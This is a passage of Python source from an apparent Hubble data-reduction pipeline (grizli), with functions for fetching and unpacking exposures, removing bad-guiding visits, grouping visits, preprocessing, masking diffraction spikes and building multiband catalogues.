make_directories(root=field_root, HOME_PATH=HOME_PATH,
paths=paths)
tab = utils.read_catalog(os.path.join(paths['home'],
f'{field_root}_footprint.fits'))
# Fix CLEAR filter names
for i, filt_i in enumerate(tab['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
tab['filter'][i] = filt_i.upper()
use_filters = utils.column_string_operation(tab['filter'], filters,
method='startswith', logical='or')
tab = tab[use_filters]
if len(tab) > 0:
if MAST_QUERY:
tab = query.get_products_table(tab, extensions=['RAW', 'C1M'])
tab = tab[(tab['filter'] != 'F218W')]
if ONLY_F814W:
tab = tab[(tab['filter'] == 'F814W') |
(tab[instdet_key] == 'WFC3/IR')]
# Fetch and preprocess IR backgrounds
os.chdir(paths['raw'])
# Ignore files already moved to RAW/Expflag
bad_files = glob.glob('./Expflag/*')
badexp = np.zeros(len(tab), dtype=bool)
for file in bad_files:
root = os.path.basename(file).split('_')[0]
badexp |= tab['observation_id'] == root.lower()
is_wfpc2 = utils.column_string_operation(tab['instrument_name'],
'WFPC2', method='startswith', logical='or')
use_filters = utils.column_string_operation(tab['filter'],
filters, method='startswith', logical='or')
fetch_selection = (~badexp) & (~is_wfpc2) & use_filters
curl = fetch.make_curl_script(tab[fetch_selection], level=None,
script_name='fetch_{0}.sh'.format(field_root),
inst_products=inst_products, skip_existing=True,
output_path='./', s3_sync=s3_sync)
msg = 'Fetch {0} files (s3_sync={1})'.format(fetch_selection.sum(),
s3_sync)
utils.log_comment(utils.LOGFILE, msg, verbose=True)
# Ugly callout to shell
os.system('sh fetch_{0}.sh'.format(field_root))
if (is_wfpc2 & use_filters).sum() > 0:
# Have to get WFPC2 from ESA
wfpc2_files = (~badexp) & (is_wfpc2) & use_filters
curl = fetch.make_curl_script(tab[wfpc2_files], level=None,
script_name='fetch_wfpc2_{0}.sh'.format(field_root),
inst_products=inst_products, skip_existing=True,
output_path='./', s3_sync=False)
os.system('sh fetch_wfpc2_{0}.sh'.format(field_root))
else:
msg = 'Warning: no files to fetch for filters={0}.'.format(filters)
utils.log_comment(utils.LOGFILE, msg, verbose=True)
# Gunzip if necessary
files = glob.glob('*raw.fits.gz')
files.extend(glob.glob('*fl?.fits.gz'))
files.extend(glob.glob('*c[01]?.fits.gz')) # WFPC2
files.sort()
for file in files:
status = os.system('gunzip {0}'.format(file))
print('gunzip '+file+' # status="{0}"'.format(status))
if status == 256:
os.system('mv {0} {1}'.format(file, file.split('.gz')[0]))
if fetch_only:
files = glob.glob('*raw.fits')
files.sort()
return files
# Remove exposures with bad EXPFLAG
if remove_bad:
remove_bad_expflag(field_root=field_root, HOME_PATH=paths['home'],
min_bad=min_bad_expflag)
# Reprocess the RAWs into FLTs
if reprocess_parallel:
rep = "python -c 'from grizli.pipeline import reprocess; "
rep += "reprocess.reprocess_wfc3ir(parallel={0},clean_dark_refs={1})'"
os.system(rep.format(reprocess_parallel, reprocess_clean_darks))
else:
from grizli.pipeline import reprocess
reprocess.reprocess_wfc3ir(parallel=False,
clean_dark_refs=reprocess_clean_darks)
# Fetch PFLAT reference files needed for optimal drizzled weight images
if fetch_flt_calibs:
flt_files = glob.glob('*_fl?.fits')
flt_files.sort()
#calib_paths = []
for file in flt_files:
cpaths = utils.fetch_hst_calibs(file,
calib_types=fetch_flt_calibs)
# calib_paths.extend(paths)
# Copy mask files generated from preprocessing
os.system('cp *mask.reg {0}'.format(paths['prep']))
# Persistence products
os.chdir(paths['persist'])
persist_files = fetch.persistence_products(tab)
for file in persist_files:
if not os.path.exists(os.path.basename(file)):
print(file)
os.system('curl -O {0}'.format(file))
for file in persist_files:
root = os.path.basename(file).split('.tar.gz')[0]
if os.path.exists(root):
print('Skip', root)
continue
# Ugly callout to shell
os.system('tar xzvf {0}.tar.gz'.format(root))
os.system('rm {0}/*extper.fits {0}/*flt_cor.fits'.format(root))
os.system('ln -sf {0}/*persist.fits ./'.format(root))
def remove_bad_expflag(field_root='', HOME_PATH='./', min_bad=2):
"""
Remove FLT files in RAW directory with bad EXPFLAG values, which
usually corresponds to failed guide stars.
The script moves files associated with an affected visit to a subdirectory
>>> bad_dir = os.path.join(HOME_PATH, field_root, 'RAW', 'Expflag')
Parameters
----------
field_root : str
Field name, i.e., 'j123654+621608'
HOME_PATH : str
Base path where files are found.
min_bad : int
Minimum number of exposures of a visit where
`EXPFLAG == 'INDETERMINATE'`. Occasionally the first exposure of a
visit has this value set even though guiding is OK, so set to 2
to try to flag more problematic visits.
"""
import os
import glob
import numpy as np
try:
from .. import prep, utils
except:
from grizli import prep, utils
os.chdir(os.path.join(HOME_PATH, field_root, 'RAW'))
files = glob.glob('*raw.fits')+glob.glob('*flc.fits')
files.sort()
if len(files) == 0:
return False
expf = utils.header_keys_from_filelist(files, keywords=['EXPFLAG'],
ext=0, colname_case=str.upper)
expf.write('{0}_expflag.txt'.format(field_root),
format='csv', overwrite=True)
visit_name = np.array([file[:6] for file in expf['FILE']])
visits = np.unique(visit_name)
for visit in visits:
bad = (visit_name == visit) & (expf['EXPFLAG'] != 'NORMAL')
if bad.sum() >= min_bad:
logstr = '# Found bad visit: {0}, N={1}\n'
logstr = logstr.format(visit, bad.sum())
utils.log_comment(utils.LOGFILE, logstr, verbose=True)
if not os.path.exists('Expflag'):
os.mkdir('Expflag')
os.system('mv {0}* Expflag/'.format(visit))
def parse_visits(field_root='', RAW_PATH='../RAW', use_visit=True, combine_same_pa=True, combine_minexp=2, is_dash=False, filters=VALID_FILTERS, max_dt=1e9, visit_split_shift=1.5):
"""
Organize exposures into "visits" by filter / position / PA / epoch
Parameters
----------
field_root : str
Rootname of the ``{field_root}_visits.npy`` file to create.
RAW_PATH : str
Path to raw exposures, relative to working directory
use_visit, max_dt, visit_split_shift : bool, float, float
See `~grizli.utils.parse_flt_files`.
combine_same_pa : bool
Combine exposures taken at same PA/orient + filter across visits
combine_minexp : int
Try to concatenate visits with fewer than this number of exposures
filters : list
Filters to consider
Returns
-------
visits : list
List of "visit" dicts with keys ``product``, ``files``, ``footprint``,
etc.
groups : list
Visit groups for direct / grism
info : `~astropy.table.Table`
Exposure summary table
"""
import copy
#import grizli.prep
try:
from .. import prep, utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.parse_visits')
except:
from grizli import prep, utils
from shapely.geometry import Polygon
from scipy.spatial import ConvexHull
files = glob.glob(os.path.join(RAW_PATH, '*fl[tc].fits'))
files += glob.glob(os.path.join(RAW_PATH, '*c0m.fits'))
files += glob.glob(os.path.join(RAW_PATH, '*c0f.fits'))
files.sort()
info = utils.get_flt_info(files)
#info = info[(info['FILTER'] != 'G141') & (info['FILTER'] != 'G102')]
# Only F814W on ACS
if ONLY_F814W:
info = info[((info['INSTRUME'] == 'WFC3') & (info['DETECTOR'] == 'IR')) | (info['FILTER'] == 'F814W')]
elif filters is not None:
sel = utils.column_string_operation(info['FILTER'], filters,
method='count', logical='OR')
info = info[sel]
if is_dash:
# DASH visits split by exposure
ima_files = glob.glob(os.path.join(RAW_PATH, '*ima.fits'))
ima_files.sort()
visits = []
for file in ima_files:
# Build from IMA filename
root = os.path.basename(file).split("_ima")[0][:-1]
im = pyfits.open(file)
filt = utils.get_hst_filter(im[0].header).lower()
wcs = pywcs.WCS(im['SCI'].header)
fp = Polygon(wcs.calc_footprint())
# q_flt.fits is the pipeline product. will always be
# fewer DASH-split files
files = glob.glob(os.path.join(RAW_PATH,
f'{root}*[a-o]_flt.fits'))
files.sort()
if len(files) == 0:
continue
files = [os.path.basename(file) for file in files]
direct = {'product': '{0}-{1}'.format(root, filt),
'files': files, 'footprint': fp}
visits.append(direct)
all_groups = utils.parse_grism_associations(visits)
np.save('{0}_visits.npy'.format(field_root),
[visits, all_groups, info])
return visits, all_groups, info
visits, filters = utils.parse_flt_files(info=info,
uniquename=True, get_footprint=True,
use_visit=use_visit, max_dt=max_dt,
visit_split_shift=visit_split_shift)
# Don't run combine_minexp if have grism exposures
grisms = ['G141', 'G102', 'G800L', 'G280']
has_grism = utils.column_string_operation(info['FILTER'], grisms,
'count', 'or').sum()
if combine_same_pa:
combined = {}
for visit in visits:
filter_pa = '-'.join(visit['product'].split('-')[-2:])
prog = '-'.join(visit['product'].split('-')[-4:-3])
key = 'i{0}-{1}'.format(prog, filter_pa)
if key not in combined:
combined[key] = {'product': key, 'files': [], 'footprint': visit['footprint']}
combined[key]['files'].extend(visit['files'])
visits = [combined[k] for k in combined]
# Account for timing to combine only exposures taken at an
# epoch defined by `max_dt` days.
msg = 'parse_visits(combine_same_pa={0}),'.format(combine_same_pa)
msg += ' max_dt={1:.1f}: {0} {2:>3} visits'
utils.log_comment(utils.LOGFILE,
msg.format('BEFORE', max_dt, len(visits)),
verbose=True, show_date=True)
split_list = []
for v in visits:
split_list.extend(utils.split_visit(v, max_dt=max_dt,
visit_split_shift=1.5))
visits = split_list
utils.log_comment(utils.LOGFILE,
msg.format(' AFTER', max_dt, len(visits)),
verbose=True, show_date=True)
get_visit_exposure_footprints(visits)
print('** Combine same PA: **')
for i, visit in enumerate(visits):
print('{0} {1} {2}'.format(i, visit['product'], len(visit['files'])))
elif (combine_minexp > 0) & (not has_grism):
combined = []
for visit in visits:
if len(visit['files']) >= combine_minexp*1:
combined.append(copy.deepcopy(visit))
else:
filter_pa = '-'.join(visit['product'].split('-')[-2:])
has_match = False
fp = visit['footprint']
for ic, cvisit in enumerate(combined):
ckey = '-'.join(cvisit['product'].split('-')[-2:])
if ckey == filter_pa:
cfp = cvisit['footprint']
if cfp.intersection(fp).area > 0.2*fp.area:
has_match = True
cvisit['files'].extend(visit['files'])
if 'footprints' in visit.keys():
cvisit['footprints'].extend(visit['footprints'])
cvisit['footprint'] = cfp.union(fp)
# No match, add the singleton visit
if not has_match:
combined.append(copy.deepcopy(visit))
visits = combined
print('** Combine Singles: **')
for i, visit in enumerate(visits):
print('{0} {1} {2}'.format(i, visit['product'], len(visit['files'])))
all_groups = utils.parse_grism_associations(visits)
print('\n == Grism groups ==\n')
valid_groups = []
for g in all_groups:
try:
print(g['direct']['product'], len(g['direct']['files']), g['grism']['product'], len(g['grism']['files']))
valid_groups.append(g)
except:
pass
all_groups = valid_groups
np.save('{0}_visits.npy'.format(field_root), [visits, all_groups, info])
return visits, all_groups, info
def get_visit_exposure_footprints(visit_file='j1000p0210_visits.npy', check_paths=['./', '../RAW'], simplify=1.e-6):
"""
Add exposure-level footprints to the visit dictionary
Parameters
----------
visit_file : str, list
File produced by `parse_visits` (`visits`, `all_groups`, `info`).
If a list, just parse a list of visits and don't save the file.
check_paths : list
Look for the individual exposures in `visits[i]['files']` in these
paths.
simplify : float
Shapely `simplify` parameter the visit footprint polygon.
Returns
-------
visits : dict
"""
if isinstance(visit_file, str):
visits, all_groups, info = np.load(visit_file, allow_pickle=True)
else:
visits = visit_file
fps = {}
for visit in visits:
visit['footprints'] = []
visit_fp = None
for file in visit['files']:
fp_i = None
for path in check_paths:
pfile = os.path.join(path, file)
if os.path.exists(pfile):
fp_i = utils.get_flt_footprint(flt_file=pfile)
if visit_fp is None:
visit_fp = fp_i.buffer(1./3600)
else:
visit_fp = visit_fp.union(fp_i.buffer(1./3600))
break
visit['footprints'].append(fp_i)
if visit_fp is not None:
if simplify > 0:
visit['footprint'] = visit_fp.simplify(simplify)
else:
visit['footprint'] = visit_fp
fps[file] = fp_i
# ToDo: also update visits in all_groups with `fps`
# Resave the file
if isinstance(visit_file, str):
np.save(visit_file, [visits, all_groups, info])
return visits
def manual_alignment(field_root='j151850-813028', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic/', skip=True, radius=5., catalogs=['PS1', 'DES', 'SDSS', 'GAIA', 'WISE'], visit_list=None, radec=None):
#import pyds9
import glob
import os
import numpy as np
#import grizli
from ..prep import get_radec_catalog
from .. import utils, prep, ds9
files = glob.glob('*guess')
tab = utils.read_catalog(os.path.join(HOME_PATH,
f'{field_root}_footprint.fits'))
visits, all_groups, info = np.load('{0}_visits.npy'.format(field_root),
allow_pickle=True)
use_visits = []
for visit in visits:
if visit_list is not None:
if visit['product'] not in visit_list:
continue
filt = visit['product'].split('-')[-1]
if (not filt.startswith('g')):
hasg = os.path.exists('{0}.align_guess'.format(visit['product']))
if hasg & skip:
continue
use_visits.append(visit)
print(len(use_visits), len(visits))
if len(use_visits) == 0:
return True
if radec is None:
radec, ref_catalog = get_radec_catalog(ra=np.mean(tab['ra']),
dec=np.median(tab['dec']),
product=field_root,
reference_catalogs=catalogs, radius=radius)
else:
ref_catalog = catalogs[0]
reference = '{0}/{1}_{2}.reg'.format(os.getcwd(), field_root,
ref_catalog.lower())
ds9 = ds9.DS9()
ds9.set('mode pan')
ds9.set('scale zscale')
ds9.set('scale log')
for visit in use_visits:
filt = visit['product'].split('-')[-1]
if (not filt.startswith('g')):
prep.manual_alignment(visit, reference=reference, ds9=ds9)
ds9.set('quit')
def clean_prep(field_root='j142724+334246'):
"""
Clean unneeded files after the field preparation
"""
import glob
import os
visits, all_groups, info = np.load('{0}_visits.npy'.format(field_root),
allow_pickle=True)
for visit in visits:
for ext in ['_drz_wht', '_seg', '_bkg']:
file = visit['product']+ext+'.fits'
if os.path.exists(file):
print('remove '+file)
os.remove(file)
clean_files = glob.glob('*crclean.fits')
for file in clean_files:
print('remove '+file)
os.remove(file)
# Do this in preprocess to avoid doing it over and over
# Fix NaNs
# flt_files = glob.glob('*_fl?.fits')
# for flt_file in flt_files:
# utils.fix_flt_nan(flt_file, verbose=True)
def preprocess(field_root='j142724+334246', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic/', PERSIST_PATH=None, min_overlap=0.2, make_combined=True, catalogs=['PS1', 'DES', 'NSC', 'SDSS', 'GAIA', 'WISE'], use_visit=True, master_radec=None, parent_radec=None, use_first_radec=False, skip_imaging=False, clean=True, skip_single_optical_visits=True, visit_prep_args=args['visit_prep_args'], persistence_args=args['persistence_args']):
"""
master_radec: force use this radec file
parent_radec: use this file if overlap < min_overlap
"""
try:
from .. import prep, utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.preprocess')
except:
from grizli import prep, utils
import os
import glob
import numpy as np
import grizli
from shapely.geometry import Polygon
from scipy.spatial import ConvexHull
import copy
if PERSIST_PATH is None:
PERSIST_PATH = os.path.join(HOME_PATH, field_root, 'Persistence')
visits, all_groups, info = np.load(f'{field_root}_visits.npy',
allow_pickle=True)
# Grism visits
master_footprint = None
radec = None
# Master table
# visit_table = os.path.join(os.path.dirname(grizli.__file__), 'data/visit_alignment.txt')
# if os.path.exists(visit_table):
# visit_table = utils.GTable.gread(visit_table)
# else:
# visit_table = None
for i in range(len(all_groups)):
direct = all_groups[i]['direct']
grism = all_groups[i]['grism']
print(i, direct['product'], len(direct['files']), grism['product'], len(grism['files']))
if len(glob.glob(grism['product']+'_dr?_sci.fits')) > 0:
print('Skip grism', direct['product'], grism['product'])
continue
# Do all ACS G800L files exist?
if 'g800l' in grism['product']:
test_flc = True
for file in grism['files']:
test_flc &= os.path.exists(file)
if test_flc:
print('Skip grism (all FLC exist)', direct['product'],
grism['product'])
continue
# Make guess file
# if visit_table is not None:
# ix = ((visit_table['visit'] == direct['product']) &
# (visit_table['field'] == field_root))
#
# if ix.sum() > 0:
# guess = visit_table['xshift', 'yshift', 'rot', 'scale'][ix]
# guess['rot'] = 0.
# guess['scale'] = 1.
# print('\nWCS: '+direct['product']+'\n', guess)
# guess.write('{0}.align_guess'.format(direct['product']),
# format='ascii.commented_header')
if master_radec is not None:
radec = master_radec
best_overlap = 0.
else:
radec_files = glob.glob('*cat.radec')
radec = parent_radec
best_overlap = 0
fp = direct['footprint']
for rdfile in radec_files:
if os.path.exists(rdfile.replace('cat.radec', 'wcs_failed')):
continue
points = np.loadtxt(rdfile)
try:
hull = ConvexHull(points)
except:
continue
rd_fp = Polygon(points[hull.vertices, :])
olap = rd_fp.intersection(fp)
if (olap.area > min_overlap*fp.area) & (olap.area > best_overlap):
radec = rdfile
best_overlap = olap.area
if use_first_radec:
master_radec = radec
print('\n\n\n{0} radec: {1}\n\n\n'.format(direct['product'], radec))
###########################
# Preprocessing script, background subtraction, etc.
status = prep.process_direct_grism_visit(direct=direct, grism=grism,
radec=radec, skip_direct=False, **visit_prep_args)
###################################
# Persistence Masking
for file in direct['files']+grism['files']:
print(file)
pfile = os.path.join(PERSIST_PATH,
file.replace('_flt', '_persist'))
if os.path.exists(pfile):
prep.apply_persistence_mask(file, path=PERSIST_PATH,
**persistence_args)
# Fix NaNs
utils.fix_flt_nan(file, verbose=True)
# From here, `radec` will be the radec file from the first grism visit
#master_radec = radec
if skip_imaging:
return True
# Ancillary visits
imaging_visits = []
for visit in visits:
filt = visit['product'].split('-')[-1]
if (len(glob.glob(visit['product']+'_dr?_sci.fits')) == 0) & (not filt.startswith('g1')):
imaging_visits.append(visit)
# Run preprocessing in order of decreasing filter wavelength
filters = [v['product'].split('-')[-1] for v in visits]
fwave = np.cast[float]([f.replace('f1', 'f10'). \
replace('f098m', 'f0980m'). \
replace('lp', 'w'). \
replace('fq', 'f')[1:-1]
for f in filters])
if len(np.unique(fwave)) > 1:
sort_idx = np.argsort(fwave)[::-1]
else:
sort_idx = np.arange(len(fwave), dtype=int)
for i in sort_idx:
direct = visits[i]
if 'g800l' in direct['product']:
continue
# Skip singleton optical visits
if (fwave[i] < 900) & (len(direct['files']) == 1):
if skip_single_optical_visits:
print('Only one exposure, skip', direct['product'])
continue
if len(glob.glob(direct['product']+'_dr?_sci.fits')) > 0:
print('Skip', direct['product'])
continue
else:
print(direct['product'])
if master_radec is not None:
radec = master_radec
best_overlap = 0
fp = direct['footprint']
else:
radec_files = glob.glob('*cat.radec')
radec = parent_radec
best_overlap = 0
radec_n = 0
fp = direct['footprint']
for rdfile in radec_files:
points = np.loadtxt(rdfile)
hull = ConvexHull(points)
rd_fp = Polygon(points[hull.vertices, :])
olap = rd_fp.intersection(fp)
if (olap.area > min_overlap*fp.area) & (olap.area > best_overlap) & (len(points) > 0.2*radec_n):
radec = rdfile
best_overlap = olap.area
radec_n = len(points)
print('\n\n\n{0} radec: {1} ({2:.2f})\n\n\n'.format(direct['product'], radec, best_overlap/fp.area))
try:
try:
status = prep.process_direct_grism_visit(direct=direct,
grism={}, radec=radec,
skip_direct=False, **visit_prep_args)
except:
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE, "# !! First `prep` run failed with `run_tweak_align`. Try again")
if 'run_tweak_align' in visit_prep_args:
visit_prep_args['run_tweak_align'] = False
status = prep.process_direct_grism_visit(direct=direct,
grism={}, radec=radec,
skip_direct=False, **visit_prep_args)
failed_file = '%s.failed' % (direct['product'])
if os.path.exists(failed_file):
os.remove(failed_file)
###################################
# Persistence Masking
for file in direct['files']:
print(file)
pfile = os.path.join(PERSIST_PATH,
file.replace('_flt', '_persist'))
if os.path.exists(pfile):
prep.apply_persistence_mask(file, path=PERSIST_PATH,
**persistence_args)
# Fix NaNs
utils.fix_flt_nan(file, verbose=True)
except:
fp = open('%s.failed' % (direct['product']), 'w')
fp.write('\n')
fp.close()
###################################
# WFC3/IR Satellite trails
if False:
from mywfc3.satdet import _detsat_one
wfc3 = (info['INSTRUME'] == 'WFC3') & (info['DETECTOR'] == 'IR')
for file in info['FILE'][wfc3]:
print(file)
mask = _detsat_one(file, update=False, ds9=None, plot=False, verbose=True)
###################################
# Clean up
if clean:
clean_prep(field_root=field_root)
###################################
# Drizzle by filter
# failed = [f.split('.failed')[0] for f in glob.glob('*failed')]
# keep_visits = []
# for visit in visits:
# if visit['product'] not in failed:
# keep_visits.append(visit)
#
# overlaps = utils.parse_visit_overlaps(keep_visits, buffer=15.0)
# np.save('{0}_overlaps.npy'.format(field_root), [overlaps])
#
# keep = []
# wfc3ir = {'product':'{0}-ir'.format(field_root), 'files':[]}
# if not make_combined:
# return True
#
# for overlap in overlaps:
# filt = overlap['product'].split('-')[-1]
# overlap['product'] = '{0}-{1}'.format(field_root, filt)
#
# overlap['reference'] = '{0}-ir_drz_sci.fits'.format(field_root)
#
# if False:
# if 'g1' not in filt:
# keep.append(overlap)
# else:
# keep.append(overlap)
#
# if filt.upper() in ['F098M','F105W','F110W', 'F125W','F140W','F160W']:
# wfc3ir['files'].extend(overlap['files'])
#
# prep.drizzle_overlaps([wfc3ir], parse_visits=False, pixfrac=0.6, scale=0.06, skysub=False, bits=None, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False)
#
# prep.drizzle_overlaps(keep, parse_visits=False, pixfrac=0.6, scale=0.06, skysub=False, bits=None, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False)
def mask_IR_psf_spikes(visit={},
mag_lim=17, cat=None, cols=['mag_auto', 'ra', 'dec'], minR=8, dy=5, selection=None, length_scale=1, dq_bit=2048):
"""
Mask 45-degree diffraction spikes around bright stars
minR: float
Mask spike pixels > minR from the star centers
dy : int
Mask spike pixels +/- `dy` pixels from the computed center of a spike.
selection : bool array
If None, then compute `mag < mag_auto` from `cat`. Otherwise if
supplied, use as the selection mask.
length_scale : float
Scale length of the spike mask by this factor. The default spike mask
length in pixels is
>>> # m = star AB magnitude
>>> mask_len = 4*np.sqrt(10**(-0.4*(np.minimum(m,17)-17)))/0.06
"""
from scipy.interpolate import griddata
if cat is None:
cat = utils.read_catalog('{0}.cat.fits'.format(visit['product']))
try:
mag, ra, dec = cat[cols[0]], cat[cols[1]], cat[cols[2]]
except:
mag, ra, dec = cat['MAG_AUTO'], cat['X_WORLD'], cat['Y_WORLD']
if selection is None:
selection = mag < 17
for file in visit['files']:
if not os.path.exists(file):
print('Mask diffraction spikes (skip file {0})'.format(file))
continue
im = pyfits.open(file, mode='update')
print('Mask diffraction spikes ({0}), N={1} objects'.format(file, selection.sum()))
for ext in [1, 2, 3, 4]:
if ('SCI', ext) not in im:
break
wcs = pywcs.WCS(im['SCI', ext].header, fobj=im)
try:
cd = wcs.wcs.cd
except:
cd = wcs.wcs.pc
footp = utils.WCSFootprint(wcs)
points = np.array([ra, dec]).T
selection &= footp.path.contains_points(points)
if selection.sum() == 0:
continue
sh = im['SCI', ext].data.shape
mask = np.zeros(sh, dtype=int)
iy, ix = np.indices(sh)
# Spider angles, by hand!
thetas = np.array([[1.07000000e+02, 1.07000000e+02, -8.48089636e-01, 8.46172810e-01],
[3.07000000e+02, 1.07000000e+02, -8.48252315e-01, 8.40896646e-01],
[5.07000000e+02, 1.07000000e+02, -8.42360089e-01, 8.38631568e-01],
[7.07000000e+02, 1.07000000e+02, -8.43990233e-01, 8.36766818e-01],
[9.07000000e+02, 1.07000000e+02, -8.37264191e-01, 8.31481992e-01],
[1.07000000e+02, 3.07000000e+02, -8.49196752e-01, 8.47137753e-01],
[3.07000000e+02, 3.07000000e+02, -8.46919396e-01, 8.43697746e-01],
[5.07000000e+02, 3.07000000e+02, -8.43849045e-01, 8.39136104e-01],
[7.07000000e+02, 3.07000000e+02, -8.40070025e-01, 8.36362299e-01],
[9.07000000e+02, 3.07000000e+02, -8.35218388e-01, 8.34258999e-01],
[1.07000000e+02, 5.07000000e+02, -8.48708154e-01, 8.48377823e-01],
[3.07000000e+02, 5.07000000e+02, -8.45874787e-01, 8.38512574e-01],
[5.07000000e+02, 5.07000000e+02, -8.37238493e-01, 8.42544142e-01],
[7.07000000e+02, 5.07000000e+02, -8.26696970e-01, 8.37981214e-01],
[9.07000000e+02, 5.07000000e+02, -8.29422567e-01, 8.32182726e-01],
[1.07000000e+02, 7.07000000e+02, -8.42331487e-01, 8.43417815e-01],
[3.07000000e+02, 7.07000000e+02, -8.40006233e-01, 8.48355643e-01],
[5.07000000e+02, 7.07000000e+02, -8.39776844e-01, 8.48106508e-01],
[7.07000000e+02, 7.07000000e+02, -8.38620315e-01, 8.40031240e-01],
[9.07000000e+02, 7.07000000e+02, -8.28351652e-01, 8.31933185e-01],
[1.07000000e+02, 9.07000000e+02, -8.40726238e-01, 8.51621083e-01],
[3.07000000e+02, 9.07000000e+02, -8.36006159e-01, 8.46746171e-01],
[5.07000000e+02, 9.07000000e+02, -8.35987878e-01, 8.48932633e-01],
[7.07000000e+02, 9.07000000e+02, -8.34104095e-01, 8.46009851e-01],
[9.07000000e+02, 9.07000000e+02, -8.32700159e-01, 8.38512715e-01]])
thetas[thetas == 107] = 0
thetas[thetas == 907] = 1014
xy = np.array(wcs.all_world2pix(ra[selection], dec[selection], 0)).T
t0 = griddata(thetas[:, :2], thetas[:, 2], xy, method='linear',
fill_value=np.mean(thetas[:, 2]))
t1 = griddata(thetas[:, :2], thetas[:, 3], xy, method='linear',
fill_value=np.mean(thetas[:, 3]))
for i, m in enumerate(mag[selection]):
# Size that depends on magnitude
xlen = 4*np.sqrt(10**(-0.4*(np.minimum(m, 17)-17)))/0.06
xlen *= length_scale
x = np.arange(-xlen, xlen, 0.05)
xx = np.array([x, x*0.])
for t in [t0[i], t1[i]]:
_mat = np.array([[np.cos(t), -np.sin(t)],
[np.sin(t), np.cos(t)]])
xr = _mat.dot(xx).T
x = xr+xy[i, :]
xp = np.cast[int](np.round(x))
#plt.plot(xp[:,0], xp[:,1], color='pink', alpha=0.3, linewidth=5)
for j in range(-dy, dy+1):
ok = (xp[:, 1]+j >= 0) & (xp[:, 1]+j < sh[0])
ok &= (xp[:, 0] >= 0) & (xp[:, 0] < sh[1])
ok &= np.abs(xp[:, 1]+j - xy[i, 1]) > minR
ok &= np.abs(xp[:, 0] - xy[i, 0]) > minR
mask[xp[ok, 1]+j, xp[ok, 0]] = 1
im['DQ', ext].data |= mask*dq_bit
im.flush()
def multiband_catalog(field_root='j142724+334246', threshold=1.8, detection_background=True, photometry_background=True, get_all_filters=False, filters=None, det_err_scale=-np.inf, phot_err_scale=-np.inf, rescale_weight=True, run_detection=True, detection_filter='ir', detection_root=None, output_root=None, use_psf_filter=True, detection_params=prep.SEP_DETECT_PARAMS, phot_apertures=prep.SEXTRACTOR_PHOT_APERTURES_ARCSEC, master_catalog=None, bkg_mask=None, bkg_params={'bw': 64, 'bh': 64, 'fw': 3, 'fh': 3, 'pixel_scale': 0.06}, use_bkg_err=False, aper_segmask=True):
"""
Make a detection catalog and run aperture photometry with the
SExtractor clone `~sep`.
phot_apertures are aperture *diameters*. If provided as a string, then
apertures assumed to be in pixel units. Can also provide a list of
elements with astropy.unit attributes, which are converted to pixels
given the image WCS/pixel size.
"""
try:
from .. import prep, utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.multiband_catalog')
except:
from grizli import prep, utils
# Make catalog
if master_catalog is None:
master_catalog = '{0}-{1}.cat.fits'.format(field_root, detection_filter)
else:
if not os.path.exists(master_catalog):
print('Master catalog {0} not found'.format(master_catalog))
return False
if not os.path.exists(master_catalog):
run_detection = True
if detection_root is None:
detection_root = '{0}-{1}'.format(field_root, detection_filter)
if output_root is None:
output_root = field_root
if run_detection:
if use_psf_filter:
psf_files = glob.glob('{0}*psf.fits'.format(field_root))
if len(psf_files) > 0:
psf_files.sort()
psf_im = pyfits.open(psf_files[-1])
msg = '# Generate PSF kernel from {0}\n'.format(psf_files[-1])
utils.log_comment(utils.LOGFILE, msg, verbose=True)
sh = psf_im['PSF', 'DRIZ1'].data.shape
# Cut out center of PSF
skip = (sh[0]-1-11)//2
psf = psf_im['PSF', 'DRIZ1'].data[skip:-1-skip, skip:-1-skip]*1
# Optimal filter is reversed PSF (i.e., PSF cross-correlation)
# https://arxiv.org/pdf/1512.06872.pdf
psf_kernel = psf[::-1, :][:, ::-1]
psf_kernel /= psf_kernel.sum()
detection_params['filter_kernel'] = psf_kernel
tab = prep.make_SEP_catalog(root=detection_root, threshold=threshold, get_background=detection_background, save_to_fits=True, rescale_weight=rescale_weight, err_scale=det_err_scale, phot_apertures=phot_apertures, detection_params=detection_params, bkg_mask=bkg_mask, bkg_params=bkg_params, use_bkg_err=use_bkg_err, aper_segmask=aper_segmask)
cat_pixel_scale = tab.meta['asec_0'][0]/tab.meta['aper_0'][0]
else:
tab = utils.GTable.gread(master_catalog)
cat_pixel_scale = tab.meta['ASEC_0']/tab.meta['APER_0']
# Source positions
#source_xy = tab['X_IMAGE'], tab['Y_IMAGE']
if aper_segmask:
seg_data = pyfits.open('{0}_seg.fits'.format(detection_root))[0].data
seg_data = np.cast[np.int32](seg_data)
aseg, aseg_id = seg_data, tab['NUMBER']
source_xy = tab['X_WORLD'], tab['Y_WORLD'], aseg, aseg_id
aseg_half = None
else:
source_xy = tab['X_WORLD'], tab['Y_WORLD']
if filters is None:
visits_file = '{0}_visits.npy'.format(field_root)
if not os.path.exists(visits_file):
get_all_filters = True
if get_all_filters:
mq = '{0}-f*dr?_sci.fits*'
mq = mq.format(field_root.replace('-100mas','-*mas'))
mosaic_files = glob.glob(mq)
mosaic_files.sort()
filters = [file.split('_')[-3][len(field_root)+1:]
for file in mosaic_files]
else:
vfile = '{0}_visits.npy'.format(field_root)
visits, all_groups, info = np.load(vfile, allow_pickle=True)
if ONLY_F814W:
info = info[((info['INSTRUME'] == 'WFC3') &
(info['DETECTOR'] == 'IR')) |
(info['FILTER'] == 'F814W')]
# UVIS
info_filters = [f for f in info['FILTER']]
for i in range(len(info)):
file_i = info['FILE'][i]
if file_i.startswith('i') & ('_flc' in file_i):
info_filters[i] += 'U'
info['FILTER'] = info_filters
filters = [f.lower() for f in np.unique(info['FILTER'])]
#filters.insert(0, 'ir')
